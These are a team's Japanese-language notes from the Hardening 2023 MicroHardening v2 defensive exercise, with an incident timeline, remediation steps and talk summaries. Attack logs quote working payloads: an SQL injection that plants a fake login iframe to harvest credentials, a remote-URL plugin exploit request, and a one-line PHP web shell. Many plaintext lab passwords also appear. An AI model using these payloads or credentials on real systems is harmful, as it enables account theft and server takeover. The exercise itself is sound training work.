2023 (https://hardening.doorkeeper.jp/events/155369)

# 2023 (https://hardening.doorkeeper.jp/events/155369) ## リンク集 - 当日のZoomURL https://us06web.zoom.us/j/81648244363?pwd=QmJCZkJPeVFHWGtVdTlQZTBDR2hSZz09 ミーティングID: 816 4824 4363 パスコード: 080831 - 事前説明資料 https://drive.google.com/file/d/1fiHMUltO8EhmyP963JtOsd4bwUYB7_wF/view?usp=share_link - microhardeningv2.hhl https://docs.google.com/document/d/17zIELJPVmjv6fxqfqQz0LgJboeabUmvb17qNuM8kJao/edit?usp=share_link5 - Hostsファイルを編集するコマンド https://drive.google.com/file/d/1AgGtIspx1_yTJoyxnQu6ch-zYUJzyhUd/view?usp=share_link - mh-logintest.ttl https://drive.google.com/file/d/17XX7UFqnCdL2l_Po6gxkjX8ITJmva8rR/view?usp=share_link - MH-接続テスト.pdf https://drive.google.com/file/d/1dz8H9zmMsylD4HVfxtCypT9V-xfBhAlB/view?usp=share_link ``` 1セット目の接続先　SSHの接続先IPアドレス：153.120.171.111 　Guacamoleの接続先URL ：http://153.120.171.111/mh-guacamole/ 2セット目の接続先　SSHの接続先IPアドレス：133.242.225.107 　Guacamoleの接続先URL ：http://133.242.225.107/mh-guacamole/ 3セット目の接続先　SSHの接続先IPアドレス：153.127.194.84 　Guacamoleの接続先URL ：http://153.127.194.84/mh-guacamole/ ``` ## ユーザ管理 P.67より． microhardeningv2.ttl ``` ;; 以下の項目を各自設定変更 SSH_1_IP = '153.120.171.111' TEAM = '5' USER = '1' ;; 以下の項目は変更しない SSH_1_PASS = 'ssh-user-pass' ``` ## 演習システムURL |タイトル|URL|ゆーざ|パスワード| |-|-|-|-| |Flat CMS GRAV|http://www.d5.local/grav/admin/user/admin|admin|Micro111| |EC-CUBE|http://www.d5.local/shop/html/| |MailGraph|http://www.d5.local/mailgraph/mailgraph.cgi| |ショッピングサイト|http://www.d5.local/shop/html/admin/|admin|password| |Blog|http://www.d5.local/blog/wp-admin/|admin|wordpress-admin| |phpMyAdmin|http://www.d5.local/phpmyadmin/|root|root| |phpPgAdmin|http://www.d5.local/phppgadmin/|admin|admin| |GroupSession|http://www.d5.local/gsession/||| ## スコア確認 - VNC接続して http://192.168.0.100:60080/graph-all.html - パスワード: `vncvnc` ## 見るところ | log | 担当 | | --------------------------- | ---- | | /var/log/auth.log | 竹原 | | /var/log/syslog | 竹原 | | /var/log/proftpd | 竹原 | | /var/log/nginx/access.log | 西川 | | /var/log/nginx/error.log | 西川 | | /var/log/mysql | | | /var/log/apache2/access.log | 西川 | | /var/log/apache2/error.log | 西川 | | /var/log/unbound.log | | - ### 踏み台サーバ - 1回目IP: 153.120.171.111 - 2回目IP: 133.242.225.107 - 3回目IP: 153.127.194.84 |Discord名|ユーザ名|パスワード| |-|-|-| |I.TAKEHARA#4984 |ssh5-1|ssh-user-pass| |Ishizuka#5661 |ssh5-2|ssh-user-pass| |yuukichi#8146 |ssh5-3|ssh-user-pass| |dr-pepper#1687 |ssh5-4|ssh-user-pass| |y.nishikawa#7777 |ssh5-5|ssh-user-pass| ### 競技用サーバ IP: 192.168.0.5 |Discord名|ユーザ名|パスワード| |-|-|-| |I.TAKEHARA#4984 |user1|user-pass| |Ishizuka#5661 |user2|user-pass| |yuukichi#8146 |user3|user-pass| |dr-pepper#1687 |user4|user-pass| |y.nishikawa#7777 |user5|user-pass| ## MicroHardening v2 (09:00) ### 議事録 #### 第1回 - 11:04 - imap-login(dvecot,syslog,faild) - ftpでログインを試みている．(1回成功) - 11:05 - admin-ajaxへの複数のアクセスをずーっと確認している - 11:08 - /mailgraph.cgiへのアクセス確認 - 192.168.0.120 - - [18/May/2023:11:07:44 +0900] "GET /grav/user/plugins/login/css/login.css HTTP/1.1" 200 882 "http://www.d5.local/grav/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/113.0.5672.92 Safari/537.36" - /blog/wp-admin/admin-ajax.php にアクセス - 11:09 - toorが増えてる(/etc/passwd) - rootでログインしている痕跡がある - →パスワードは変更 - 11:10 - ripples？ - GET /blog/wp-admin/admin-ajax.php?action=blc_dashboard_status&random=0.029775724748911436 HTTP/1.1" 200 295 "http://www.d5.local:81/blog/wp-admin/ - 192.168.0.112 - - [18/May/2023:11:14:25 +0900] "GET /blog/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.0.122/sw_www.d5.local HTTP/1.1" 200 17317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" ![](https://hackmd.io/_uploads/r11Dc-mB2.png) - 11:15 - 対策 - 11:18 - ![](https://hackmd.io/_uploads/HkPP6ZmB3.png) **** - 11:13 - /var/www/html/shop/html/template/default/css/default.cssが書き換えられた - 11:19 - Apache落ちた - blogアクセスできない - ftpで/home/farmerr/delivery.zipがアガている株式会社による画像変更業？ - ![](https://hackmd.io/_uploads/ryeYpZQHn.png) - 11:38 - ![](https://hackmd.io/_uploads/HJEzezXH2.png) ![](https://hackmd.io/_uploads/rJO-hWXH3.png) ![](https://hackmd.io/_uploads/H1Bm2bQBh.png) ![](https://hackmd.io/_uploads/SkeJabQSh.png) - 11:27 変なクエリが送られる """ 192.168.0.102 - - [18/May/2023:11:26:54 +0900] "GET /shop/html/products/list?category_id=&name=1%27+or+%271%27+%3D+%271%27%3B+update+dtb_product+set+description_detail+%3D+%27%3Ciframe+id%3D%22inline-frame%22+frameborder%3D%220%22+style%3D%22overflow%3Ahidden%3Boverflow-x%3Ahidden%3Boverflow-y%3Ahidden%3Bheight%3A100%25%3Bwidth%3A100%25%3Bposition%3Aabsolute%3Btop%3A0px%3Bleft%3A0px%3Bright%3A0px%3Bbottom%3A0px%22+height%3D%22100%25%22+width%3D%22100%25%22srcdoc%3D%22%3Chtml%3E%3Chead%3E%3Clink+rel%3D%26quot%3Bstylesheet%26quot%3B+href%3D%26quot%3B%2Fshop%2Fhtml%2Ftemplate%2Fdefault%2Fcss%2Fstyle.css%3Fv%3D3.0.9%26quot%3B%3E%3Clink+rel%3D%26quot%3Bstylesheet%26quot%3B+href%3D%26quot%3B%2Fshop%2Fhtml%2Ftemplate%2Fdefault%2Fcss%2Fdefault.css%3Fv%3D3.0.9%26quot%3B%3E%3Cscript%3Efunction+submitFnc%28%29%7Bvar+fm+%3D+document.getElementById%28%26quot%3Bsearchform%26quot%3B%29%3Bfm.name.value+%3D+%601%27%27+or+%27%271%27%27+%3D+%27%271%27%27%3B+update+plg_customer_additional_info+set+question01+%3D+%27%27%24%7Bfm.login_email.value%7D%27%27%2C+question02+%3D+%27%27%24%7Bfm.login_pass.value%7D%27%27+from+dtb_customer+where+plg_customer_additional_info.customer_id+%3D+dtb_customer.customer_id+and+dtb_customer.email+%3D+%27%27anpan%40m.local%27%27%3B+--%60%3Bfm.submit%28%29%3B%7D%3C%2Fscript%3E%3C%2Fhead%3E%3Cbody%3E%3Cform+method%3D%26quot%3Bget%26quot%3B+id%3D%26quot%3Bsearchform%26quot%3B+action%3D%26quot%3B%2Fshop%2Fhtml%2Fproducts%2Flist%26quot%3B%3E%3Cdiv+id%3D%26quot%3Blogin_box%26quot%3B+class%3D%26quot%3Brow%26quot%3B%3E%3Cdiv+id%3D%26quot%3Bmypage_login_wrap%26quot%3B+class%3D%26quot%3Bcol-sm-8+col-sm-offset-2%26quot%3B%3E%3Cdiv+id%3D%26quot%3Bmypage_login_box%26quot%3B+class%3D%26quot%3Bcolumn%26quot%3B%3E%3Cdiv+id%3D%26quot%3Bmypage_login_box__body%26quot%3B+class%3D%26quot%3Bcolumn_inner+clearfix%26quot%3B%3E%3Cdiv+class%3D%26quot%3Bicon%26quot%3B%3E%3Csvg+class%3D%26quot%3Bcb+cb-user-circle%26quot%3B%3E%3Cuse+xlink%3Ahref%3D%26quot%3B%23cb-user-circle%26quot%3B%3E%3C%2Fuse%3E%3C%2Fsvg%3E%3C%2Fdiv%3E%3Cdiv+id%3D%26quot%3Bmypage_login_box__message%26quot%3B+class%3D%26quot%3Bform-group%26quot%3B%3E%3Cp+class%3D%26quot%3Bheading03%26quot%3B%3E%E3%81%93%E3%81%AE%E5%95%86%E5%93%81%E3%81%AE%E8%A9%B3%E7%B4%B0%E6%83%85%E5%A0%B1%E3%81%AB%E3%82%A2%E3%82%AF%E3%82%BB%E3%82%B9%E3%81%99%E3%81%9F%E3%82%81%E3%81%AB%E3%81%AF%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3%E3%81%8C%E5%BF%85%E8%A6%81%E3%81%A7%E3%81%99%E3%80%82%3C%2Fp%3E%3C%2Fdiv%3E%3Cdiv+id%3D%26quot%3Bmypage_login_box__login_email%26quot%3B+class%3D%26quot%3Bform-group%26quot%3B%3E%3Cinput+type%3D%26quot%3Btext%26quot%3B+id%3D%26quot%3Blogin_email%26quot%3B+name%3D%26quot%3Blogin_email%26quot%3B+required%3D%26quot%3Brequired%26quot%3B+max_length%3D%26quot%3B320%26quot%3B+style%3D%26quot%3Bime-mode%3A+disabled%3B%26quot%3B+placeholder%3D%26quot%3B%E3%83%A1%E3%83%BC%E3%83%AB%E3%82%A2%E3%83%89%E3%83%AC%E3%82%B9%26quot%3B+class%3D%26quot%3Bform-control%26quot%3B%3E%3C%2Fdiv%3E%3Cdiv+id%3D%26quot%3Bmypage_login_box__login_pass%26quot%3B+class%3D%26quot%3Bform-group%26quot%3B%3E%3Cinput+type%3D%26quot%3Bpassword%26quot%3B+id%3D%26quot%3Blogin_pass%26quot%3B+name%3D%26quot%3Blogin_pass%26quot%3B+required%3D%26quot%3Brequired%26quot%3B+max_length%3D%26quot%3B320%26quot%3B+placeholder%3D%26quot%3B%E3%83%91%E3%82%B9%E3%83%AF%E3%83%BC%E3%83%89%26quot%3B+class%3D%26quot%3Bform-control%26quot%3B%3E%3C%2Fdiv%3E%3Cdiv+class%3D%26quot%3Bextra-form+form-group%26quot%3B%3E%3C%2Fdiv%3E%3Cdiv+id%3D%26quot%3Bmypage_login__login_button%26quot%3B+class%3D%26quot%3Bbtn_area%26quot%3B%3E%3Cp%3E%3Cinput+type%3D%26quot%3Bbutton%26quot%3B+value%3D%26quot%3B%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3%26quot%3B+onclick%3D%26quot%3BsubmitFnc%28%29%3B%26quot%3B+class%3D%26quot%3Bbtn+btn-info+btn-block+btn-lg%26quot%3B+%2F%3E%3C%2Fp%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cinput+type%3D%26quot%3Bhidden%26quot%3B+id%3D%26quot%3Bname%26quot%3B+name%3D%26quot%3Bname%26quot%3B+value%3D%26quot%3B%26quot%3B%3E%3C%2Fform%3E%3C%2Fbody%3E%3C%2Fhtml%3E%3C%2Fiframe%3E%27+where+product_id+%3D+4%3B+-- HTTP/1.1" 200 21423 "http://www.d5.local/shop/html" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko" """ 192.168.0.103 - - [18/May/2023:11:27:54 +0900] "GET /shop/html/products/list?login_email=taro@m.local&login_pass=yamadataro&name=1%27+or+%271%27+%3D+%271%27%3B+update+plg_customer_additional_info+set+question01+%3D+%27taro@m.local%27%2C+question02+%3D+%27yamadataro%27+from+dtb_customer+where+plg_customer_additional_info.customer_id+%3D+dtb_customer.customer_id+and+dtb_customer.email+%3D+%27anpan%40m.local%27%3B+-- HTTP/1.1" 200 11505 "http://www.d5.local/shop/html/products/detail/4" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" - 11:30 cronで動いてたシェルの中に`/root/heartbeeeeet.sh`があった ``` #!/bin/bash /usr/bin/curl http://192.168.0.100:60080/mhv2-heartbeeeeet > /dev/null 2>&1 ``` - 11:45 - 192.168.0.200 - - [18/May/2023:11:43:29 +0900] "GET /shop/html/admin/setting/system/member HTTP/1.1" 200 3806 "http://www.d5.local/shop/html/admin/order" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" ##### ログファイル - /var/log/* - https://drive.google.com/file/d/1rnd7iASjGhyo7S8UtttiCzoXJ8_mIeq0/view?usp=sharing #### 第2回 - 時間 - 起こったこと - 対策 - sudo nano /var/www/html/shop/src/Eccube/Controller/ProductController.phpを書き換え(西川) - `$sql = "SELECT MIN(pc.price02) as price02_min, MAX(pc.price02) as price02_max FROM dtb_product as p INNER JOIN dtb_product_class as pc ON p.product_id = pc.product_id WHERE p.name LIKE '%{$name}%' ORDER BY price02_min ASC";` - /etc/passwdでtestとadminを#で無効化 - FTPやSSHで不審なアクセスしていたため - rootパスワードを変更: `ITC8387291087` ![](https://hackmd.io/_uploads/SyU-bNXH3.png) - /var/www/blog/wp-config.php が192.168.0.5経由で接続しているので，fix - wordpressパスワード変更 → sX&VMxzp%fzyzkqJIdnNBQxG - Webシェルを作ってみて，sudoとかできるか確認した→できなかったのでWebシェル経由では大したこと出来ない．ｃｄ - screenのバイナリを入れた(竹原のみ) - 14:11 - Wordpress不正管理者アカウントを削除 - lastbやFTPで192.168.0.121が - sudo ufw deny from 192.168.0.121 to any - 14:11 - apache2が停止 - 再起動 - 14:20頃 - lang.phpとhack.txtが入る． - 14:22 - Blogにアクセスできない、Nginx停止 - 起動 - 14:24 - http://www.d5.local/shop/html/products/detail/3 - ![](https://hackmd.io/_uploads/HkK38VmBh.png) - 沖縄そば - ![](https://hackmd.io/_uploads/S1d5vEmHh.png) - 14:28 - XSS大魔王からのこうげきをけした！ - ![](https://hackmd.io/_uploads/rk6HwVmrh.png) ![](https://hackmd.io/_uploads/SyQOw47Bh.png) - 14:38 ![](https://hackmd.io/_uploads/HkiRYVXSh.png) #### 第3回 ``` sudo ufw deny from 192.168.0.121 to any sudo ufw deny 3306 sudo ufw deny 5432 sudo ufw reload ``` - /etc/passwd でtestとadminを無効化 - farmerの主グループがsudoである - users(GID1001)を作成 - farmerの主グループをusersに変更 - ホームディレクトリのchown farmer:users /home/farmerに変更 - wordpressのパスワード → `g(sdx%!KF9!C0RNxIqF0mp*C` - cronでcal_sales.shが，/tmp/shop-order_totalに書き出してるのでヤバそう． - 時間 - 起こったこと - 対策 sudo tail -f -n 20 /var/log/apache2/access.log /var/log/apache2/error.log - 15:39 - Wordpress不正アカウントが作成される - ![](https://hackmd.io/_uploads/B1MO_HXH2.png) - 削除 - 15:44 - /var/www/html/lang.phpが出来てたので削除 `<?php system($_REQUEST[cmd]); ?>` - 15:44 - construction(Wordpressの投稿)が編集されてたのを削除 - groupsesshon - admin/password，system_mail/alternatives(あやしい?)にパスワード変更 - 15:48 - grav admin/vDH77JZvsUvsZ7Dに変更 - 15:51 - XSS大魔王からのこうげきをけした！ - ![](https://hackmd.io/_uploads/rk6HwVmrh.png) - 15:53 /etc/ssh/sshd_configのRootを修正 - 16:00 - カレーの紹介が間違ってた！ - ![](https://hackmd.io/_uploads/SyC7aH7rn.png) ``` <iframe id="inline-frame" frameborder="0" style="overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px" height="100%" width="100%"srcdoc="<html><head><link rel="stylesheet" href="/shop/html/template/default/css/style.css?v=3.0.9"><link rel="stylesheet" href="/shop/html/template/default/css/default.css?v=3.0.9"><script>function submitFnc(){var fm = document.getElementById("searchform");fm.name.value = `1' or '1' = '1'; update plg_customer_additional_info set question01 = '${fm.login_email.value}', question02 = '${fm.login_pass.value}' from dtb_customer where plg_customer_additional_info.customer_id = dtb_customer.customer_id and dtb_customer.email = 'anpan@m.local'; --`;fm.submit();}</script></head><body><form method="get" id="searchform" action="/shop/html/products/list"><div id="login_box" class="row"><div id="mypage_login_wrap" class="col-sm-8 col-sm-offset-2"><div id="mypage_login_box" class="column"><div id="mypage_login_box__body" class="column_inner clearfix"><div class="icon"><svg class="cb cb-user-circle"><use xlink:href="#cb-user-circle"></use></svg></div><div id="mypage_login_box__message" class="form-group"><p class="heading03">この商品の詳細情報にアクセスすためにはログインが必要です。</p></div><div id="mypage_login_box__login_email" class="form-group"><input type="text" id="login_email" name="login_email" required="required" max_length="320" style="ime-mode: disabled;" placeholder="メールアドレス" class="form-control"></div><div id="mypage_login_box__login_pass" class="form-group"><input type="password" id="login_pass" name="login_pass" required="required" max_length="320" placeholder="パスワード" class="form-control"></div><div class="extra-form form-group"></div><div id="mypage_login__login_button" class="btn_area"><p><input type="button" value="ログイン" onclick="submitFnc();" class="btn btn-info btn-block btn-lg" /></p></div></div></div></div></div><input type="hidden" id="name" name="name" value=""></form></body></html></iframe> ``` ![](https://hackmd.io/_uploads/rkDLTSXS3.png) - 16:04 - ぜんざいが300円になってた！！3000円に戻します - ![](https://hackmd.io/_uploads/rJX4RS7rh.png) - 15:58 - 192.168.0.102と192.168.0.103をdenyしたら，スコアが上がらなくなったので，再びactiveに ### 解説 -　大事なこと -　作業プロセスの記録と共有 -　元に戻すこと -　サービス稼働状況 -　不審ログに関する調査 -　セキュリティに関する調査 -　発生したこと - サービス停止 - サービス遅延 - サーバ改ざん - FWの設定が間違い - 価格が変更されている - サービスやプラグインやファイルを消した - 非技術 - 訓練 - コミュニティケーションの方法 - 関係者の把握 - 決められている検査，打ち合わせ，監査は実施 - 技術 - パスワード - アクセス制御 - バックアップ - アップデート - 設定をコピーするときに氣をつける - 脆弱なユーザの洗い出し - 脆弱なあpスワード - 二要素認証をしようしていない - 古くから存在する - 退職したユーザ - 異動したユーザ - システム管理者のパソコンの保護 - システム管理と個人用を分離 - パスワード管理リストの運用状況 - インシデント発生時 - 宮坂さんnote - 記録を残す - 作業内容を共有 - 重大事故のときにどうするか - オンラインオペレーション - 画面共有 - 声が空中で消えないように記録を残す - 可能なら顔出し - コインチェックのドメインハイジャック - セキュリティ情報源 - サイバーセキュリティセンター - JPCERT/CC - IPA - NISC - J-CSIP - JCRART - JPCERTコーディネーションセンター - HACKING宣言 ## 13:00-17:00 Tech Showcase / OpenMic (Masafumi & Meg) - Session 1-4(OpenMicにエントリーしてください！) ## 13:00-16:00 Kuromame6への挑戦：セキュリティ・ワークショップエンタープライズAD環境でのアタック、ディテクション＆ディセプション (松井祐輔/K6サポーター) ## 18:00: オンライン懇親会 (Discord会場 and/or Zoom) ## 9:50: 濃厚なサイバーセキュリティ最前線：攻撃手法の解析とAnsibleによる堅牢化の自動化(セッションチェア:淵上真一) - MITER - Hayabusa: ルールによってノイズを消せる．ルールを把握ていなくても利用できる．ルールの結果と出力の対応には慣れが必要 - ハードニング，フォレンジックす初期nado - - 初期対応: 不審なログイン，脆弱性による攻撃，ユーザ操作による感染 - Windowsのevent log - EvtxECmd.exe Windows EventLogをcsvやjson形式で書き出す - プログラムの事項履歴Shimcache，Amcache - 時刻の変更 - CIS Benchmark - オフライン:USBメモリ，一部の機器，保守会社経由 ## 9:50: クラウドセキュリティとDXのたたかい：いかにして正しい設定を徹底するか(中野渡敬教) ## 11:20: ランチョンセッション「Micro Hardening Softening Session / 堅牢化への道を進め」 (川口洋) ## 12:50: 大規模障害から学ぶ：全社員の意識向上につながる訓練プログラムを実現する方法 (中西克彦) ## 12:50: セキュリティトレーニングカスタマージャーニーマップを考える (聴衆参加型セッション) (安田慎吾) ## 14:30: 巧妙化するサイバー脅威への対抗策：ランサムウェア・AI・未来の防衛 (中津留勇) - Raspberry Robin - セキュリティが薄い(EDRなどがない)海外拠点から経由 - 認証情報を盗んで正規ユーザとして - ビジネスプロセスの堅牢化 - 手続きの厳格化 - 情報共有体制整備(不審と思ったとき) - 演習 - バイアスによる思い込み - DDoSのコスパ - ある程度ならば収まるまで待っておく - データセンターである程度遮断 - SNS等の代替手段 - VPN，RDP，SSH - SQLサーバが外部露出 - 海外拠点とフラットすぎる　HOT! - AIの悪意ある汚染 ## 14:30: AIのメカニズムを知り、活用を知れ - 盾と剣を駆使して衞る戦士たちへの挑戦 (岡田良太郎) ## 16:00: Wrap up & Hardening 2023 Generatives募集について (門林雄基)